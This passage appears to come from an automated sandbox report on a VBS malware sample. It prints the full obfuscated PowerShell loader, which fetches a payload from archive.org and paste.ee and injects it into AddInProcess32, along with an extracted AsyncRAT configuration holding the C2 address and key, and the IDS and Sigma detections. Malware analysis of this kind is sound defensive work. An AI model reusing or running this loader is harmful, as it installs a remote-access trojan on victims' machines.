'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProc
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQ
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\qiEmGNhUij.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\qiEmGNhUij.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\qiEmGNhUij.vbs", ProcessId: 1876, ProcessName: wscript.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProc
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-02T05:23:14.424279+020020204241Exploit Kit Activity Detected188.114.96.3443192.168.2.949706TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-02T05:23:17.381443+020028424781Malware Command and Control Activity Detected148.113.165.113236192.168.2.949707TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-02T05:23:14.264513+020028410751Malware Command and Control Activity Detected192.168.2.949706188.114.96.3443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 4.2.powershell.exe.1dfb57c99b8.0.raw.unpackMalware Configuration Extractor: AsyncRAT {"Server": "148.113.165.11", "Ports": "3236", "Version": "1.0.7", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "V4JA2wRo4wMqThNx0lUpEh05ezE9saTH", "Mutex": "Dggx_gg", "Certificate": "MIICJjCCAY+gAwIBAgIVAKTSE5n95JKjYKaeetJmkZ8WSed/MA0GCSqGSIb3DQEBDQUAMFoxCzAJBgNVBAMMAmdnMRMwEQYDVQQLDApxd3FkYW5jaHVuMRwwGgYDVQQKDBNEY1JhdCBCeSBxd3FkYW5jaHVuMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjMxMjAzMTAyNjE5WhcNMzQwOTExMTAyNjE5WjAQMQ4wDAYDVQQDDAVEY1JhdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAphKhL5VEa5bZce3HMNoHj07+Nyd8QMtT+YV1vVQeIuxBYfOBrszAxxSRJayhzQwZjw8Du9bw87agBJW06h+GHW8MOufcZ+vKSxmpOL0ze3nUSJiOsfboKa06jcmEpo32D7LTxng9/mAGKb0YGEFUGx88yMDaa+NiBIn/LnWXvaECAwEAAaMyMDAwHQYDVR0OBBYEFMn0HT3AJLPhSr+HTYNM/0589fJ0MA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEASB+of3f3t+mAacV7FNg5vwlQhgObMv2su+9BL5KxsQVNsBhluNcrZINzF5jKq/8VafO48B00S1O2MnNHmBXQlZ09Iw8Krvm1hZDmBErHPe0Bwwa5ox6ZpJLnodcOGX2JXMfEY2n/6QC0zva9sGQiyazHOYJRTk5RgJhN7j10nZY=", "ServerSignature": "XjeYWme80rSVhHa/BEFI1k3bRgPGhkJfVbkFLvepbqtufl6cOLxu+woVZZM7psVFdchemmHXVOOta4B/iTyJBzInHTih/neulrIRbgq5zdS22cEhHESwIui1ZS3o5BnYGcZRdZTdXfGH6otoicbOBzdpc41nx3BIOXuL5tRHqjI=", "BDOS": "null", "External_config_on_Pastebin": "false"}
        Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVirustotal: Detection: 10%Perma Link
        Source: qiEmGNhUij.vbsVirustotal: Detection: 9%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.9:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49706 version: TLS 1.2
        Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000004.00000002.1528856037.000001DFCD980000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1506314735.000001DFC61A7000.00000004.00000800.00020000.00000000.sdmp

        Software Vulnerabilities

        barindex
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 148.113.165.11:3236 -> 192.168.2.9:49707
        Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.9:49706 -> 188.114.96.3:443
        Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 188.114.96.3:443 -> 192.168.2.9:49706
        Source: unknownDNS query: name: paste.ee
        Source: Yara matchFile source: 4.2.powershell.exe.1dfb57c99b8.0.raw.unpack, type: UNPACKEDPE
        Source: global trafficTCP traffic: 192.168.2.9:49707 -> 148.113.165.11:3236
        Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /d/AaTNM/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
        Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
        Source: Joe Sandbox ViewIP Address: 207.241.227.240 207.241.227.240
        Source: Joe Sandbox ViewASN Name: GOOGLE-PRIVATE-CLOUDUS GOOGLE-PRIVATE-CLOUDUS
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: unknownTCP traffic detected without corresponding DNS query: 148.113.165.11
        Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /d/AaTNM/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: ia600100.us.archive.org
        Source: global trafficDNS traffic detected: DNS query: paste.ee
        Source: AddInProcess32.exe, 00000005.00000002.2712121235.00000000052C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: AddInProcess32.exe, 00000005.00000002.2712121235.00000000052C0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB6846000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ia600100.us.archive.org
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB6BEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1506314735.000001DFC51FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB6AA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.1540245190.0000025025A19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB5191000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2703147210.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB688E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB6AA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.1540245190.00000250259F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1540245190.00000250259DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB5191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB556C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB556C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB556C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB556C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
        Source: powershell.exe, 00000004.00000002.1506314735.000001DFC51FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000004.00000002.1506314735.000001DFC51FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000004.00000002.1506314735.000001DFC51FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB556C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB556C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB6AA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB61B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB61B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.arX
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB61B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB53B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB53B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB53B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtve5;9jDbase64Content
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB6BEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1506314735.000001DFC51FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
